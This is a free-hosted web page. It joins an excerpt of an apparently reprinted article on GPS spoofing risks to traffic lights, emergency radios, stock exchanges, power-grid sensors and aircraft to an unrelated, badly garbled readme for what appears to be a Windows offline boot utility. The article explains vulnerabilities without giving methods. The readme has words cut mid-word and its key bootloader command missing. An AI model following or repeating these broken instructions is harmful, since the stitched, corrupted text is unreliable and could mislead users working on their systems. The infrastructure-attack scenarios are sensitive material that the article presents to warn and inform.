Several hackers at different intersections or in different cities could coordinate attacks. Or one of them could set off a cascade of intersection disruptions in one city. When I raised this scenario to a supervisor of traffic signal electricians in San Francisco who was closely involved with the city’s procurement of traffic signal cabinets, he did not think there was a means for anyone to wirelessly connect to the GPS and change its time setting. Yet the Garmin GPS modules that San Francisco uses in its lights employ no antispoofing protections; rather the manufacturer’s technical specifications state that to comply with Federal Communications Commission regulations, the Garmin device must accept any radio-frequency interference it encounters, even if it could scramble the module’s readout.
Not every city uses GPS to time traffic signals, but the alternatives are not necessarily better. Dale Picha, traffic operations manager for the Texas Department of Transportation’s San Antonio district, says the district has been moving away from individual GPS receivers on traffic signal cabinets, choosing to get the time from cell networks instead. But those can be spoofed, too.
People injured in traffic accidents might have to wait awhile for help because paramedics’ radios rely on GPS timing. When several GPS satellites provided incorrect time because of a glitch in 2016, virtually every emergency-responder system in North America experienced communications problems.
A larger target would be the global financial system. In a swampy part of New Jersey two miles from MetLife Stadium, trillions of dollars’ worth of financial instruments are traded every day in bits and bytes. The Equinix data center there hosts 49 exchanges, including the New York Stock Exchange. An error introduced in a GPS receiver that time-stamps stock transactions would “inject confusion into the operations of the financial industry,” says Andrew F. Bach, former global head of network services for the New York Stock Exchange. Seeing something amiss, computers—which now account for 60 percent of market volume, according to J.P. Morgan—might decide to sit on the sidelines. “When too many people head for the exits at the same time, we get a real problem,” says Andrew Lo, a professor of finance at the M.I.T. Sloan School of Management. “It can easily lead to a flash crash [a sudden and dramatic downturn in stock prices] or something much more long-lasting.” Noah Stoffman, an associate professor of finance at the Indiana University Kelley School of Business, says: “I can easily imagine that disrupting GPS would have catastrophic economic consequences.”
 
As markets reeled in New York, attackers could assault the electric grid in the heartland through a piece of hardware common at virtually every local substation. The Platte River Power Authority’s Fordham substation in Longmont, Colo., 35 miles north of Denver, near where I recently lived, is typical in its equipment and in its ease of reach by a concealed potential attacker. Sitting behind a 12-foot wall around the corner from a Holiday Inn Express, the open-air installation pares electricity in high-voltage transmission lines, generated at a big gas-fired power plant miles away, down to a level that local lines can feed to 348,000 home and business customers in Longmont and three nearby cities.
 
Scattered across the roughly six-acre facility are metal boxes containing phasor measurement units (PMUs), which monitor the status of the grid. The PMUs’ timing is set by a GPS. Jeff Dagle, an electrical engineer at Pacific Northwest National Laboratory, who is an expert on U.S. electricity networks, insists that because PMUs are not critical to the grid’s actual operation, spoofing them would not cause a blackout. But a September 2017 report from NIST maintains that a spoofing attack on PMUs could force a generator off-line. The sudden loss of several large generators, it says, “would create an instantaneous supply-demand imbalance and grid instability”—a potential blackout. Humphreys and his colleagues demonstrated such a timing failure in a lab environment. Although the PMUs are behind a wall, their GPS receivers could be spoofed from a hotel room a quarter of a mile away. There are 55,000 substations across the U.S.
 
Goward and Humphreys have warned utility executives about the danger they face, and they say few are aware. Fewer still, they maintain, have adequate contingency plans (some of which also rely on GPS). Human controllers who oversee grid networks “wouldn’t think to look at GPS as a possible source of the problem for probably hours,” Goward says. Furthermore, he notes, “attackers would be able to disguise what they’re doing for quite some time.”
 
Blackouts are costly and dangerous, but spoofing an airplane might provide the greatest drama. Humphreys and Eurocontrol’s Berz agree that it would be difficult but possible. Military aircraft use a device called a selective availability antispoofing module, but it is not required on civilian aircraft, and deployment is heavily restricted by the government. Lauth, who trains air traffic controllers, told me that pilots have other options for landing. The primary backup, however, is an airport’s instrument landing system, which provides aircraft with horizontal and vertical guidance and its distance from the landing spot. The system operates on radio waves and was built for safety, not security, so it is unencrypted—meaning a person can spoof it by inducing the aircraft’s receiver to lock onto a false signal.
Society’s reliance on GPS will only increase. The 5G-enabled Internet of Things will depend heavily on GPS because devices need precise timing to sync with one another and across networks. So will the “mirror world,” a digital representation of the real world that machines will need to produce for AI and augmented-reality applications.
 
Although the DHS acknowledges the threat, not everyone is pleased with what it is doing—or not doing—about it. James Platt, director of the position, navigation and timing office at the DHS, says the agency is working with NIST to outline varying levels of security for different receiver types. And the DHS conducts annual exercises that allow equipment manufacturers to test their machines against attack. The results are not public, but Logan Scott, a consultant who has worked with GPS for 40 years, says “a lot of receivers do not do well when exposed to jamming and spoofing.”

Antispoofing
is a burgeoning field of research, with hundreds of papers published in the past several years. For example, during a spoofing attack, a vestige of the true GPS signal manifests on the receiver as distortion. Specialized receivers can monitor such distortion and give an alarm if it is detected, but the spoofer can generate a signal to nullify the distortion. “There is no foolproof defense,” Humphreys says. “What you can try is to price your opponent out of the game” by deploying antispoofing protections. Armed with the right equipment, though, a spoofer can overcome them. Protections and new threats are continually evolving in a kind of arms race in the radio-frequency spectrum. “If your opponent happens to be the Russian Federation,” Humphreys says, “good luck.”
An arms race could be defused if the U.S. built a backup timing system like the ones other countries maintain. In December 2018 President Donald Trump signed the National Timing Resilience and Security Act, which instructs the Department of Transportation (DOT) to build a “land-based, resilient, and reliable alternative timing system” by 2020. But neither the act nor the president has funded this undertaking.
The law was just the latest example of the U.S. government’s inadequate response, say critics such as Goward and others. The DHS issued a report on GPS vulnerability in 2001. President George W. Bush directed the DHS and the DOT to create a backup in 2004. The deputy defense secretary and deputy transportation secretary told Congress in 2015 that they would collaborate on a system known as eLoran (enhanced long-range navigation), which does exactly what the 2018 bill requires. Congress funded an eLoran pilot program years ago, but not a penny of that funding has been spent. Adam Sullivan, DOT assistant secretary for governmental affairs, told Peter DeFazio, chair of the House Transportation and Infrastructure Committee, in a May 8 letter that the DOT “is planning to conduct a field demonstration of technologies ... capable of providing backup [position, navigation and timing] services to critical infrastructure” by the end of 2019. In September the DOT issued a request for proposals, a week after Senator Ted Cruz of Texas and Senator Ed Markey of Massachusetts wrote the transportation secretary to ask what was taking so long.
 
An eLoran system would render jamming and spoofing almost irrelevant by delivering a low-frequency radio signal that is much stronger than GPS’s ultrahigh-frequency signal and hence is virtually impossible to override. The plan for eLoran would be to build about two dozen giant antennas necessary for nationwide coverage through a public-private partnership, according to Goward and to Representative John Garamendi of California, who has been prodding several administrations to act. The U.S. Air Force and the Pentagon are reportedly looking at other potential backup systems as well. The backups that various countries maintain are all essentially versions of eLoran.
 
Even if work begins tomorrow, eLoran will take years to build. It will be even longer before new devices and receivers that can pick up the signal are designed, manufactured and delivered to customers. “Four years is optimistic,” says Frank Prautzsch, a former director of network systems at Raytheon, who also worked on space systems at Hughes Space and Communications.
A different global patch would be to alter GPS signals at the satellite source with digital signatures that authenticate the data and deploy the public-private key infrastructure common to cryptography. But the signal coming from the current constellation of satellites cannot be changed. An air force spokesperson said no plans exist to incorporate digital signatures into the next generation of satellites, now being built at a secure Lockheed Martin facility west of Denver.
Despite all that, Platt is confident in critical infrastructure’s resilience. “We’ve talked with industry to make sure they have mitigation strategies in place,” he says. Goward’s response: “Suggest to Jim that we turn GPS off for 24 hours just to see what happens.”


FINALLY
A GIFT TO YOU
***************************************************************************
*                                                                         *
*             *
*                                                                         *
*
*                                                                         *
* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *
*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *
*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *
*                                                                                     *
************************************************************************ept some drivers may have to be loaded manually with the 'm' menu option after boot.
 ---The dit has now been tested with the following:
NT 3.51, NT 4, Windows 2000, Windows XP, Windows 2003 Server,Vista, Windows 7, Server 2008, Windows 8, Windows 8.1, Server 2012
As far as I know, it will work with all Service ons shold be OK.
 ---To make a bootable USB drive / key:
1. Copy all files from this CD onto the USB drive. It cannot be in a subdirectory on the drive. You do not need delete files already on the drive.
2. Install the bootloader
   On the USB drive, there sho
   Start a command line window (cmd.exe) with "run as administrator"
   From the command line, run the command
replace j with some other letter if your USB drive is on another drive letter than j:
On some drives, you may have to omit the -ma option if you get an error.
If it says nothing,he bootloader.
Please note that you may have to adjust settings in your computers BIOS setup to boot from USB.
lder machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS, and a lot of them are rather buggy when it comes to booting off different media, so Inable to help you.
 
SOURCE: THIS TESTAMENT HAS BEEN SOURCED FROM THE INTERNET AND BEARS NO ALLEGIANCE TO ANY ORGANISATION KNOWN OR UNKNOWN.
THE AUTHOR/COMPILER OF THIS TESTAMENT IS AN ENTHUSIASTIC COMPUTER ENGINEER WITEARS OF EXPERIENCE IN PROGRAMMING AND WEB KINEMATICS.
THIS TESTAMENT IS FOR ADVANCED COMPUTER USERS ONLY
 
 

This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free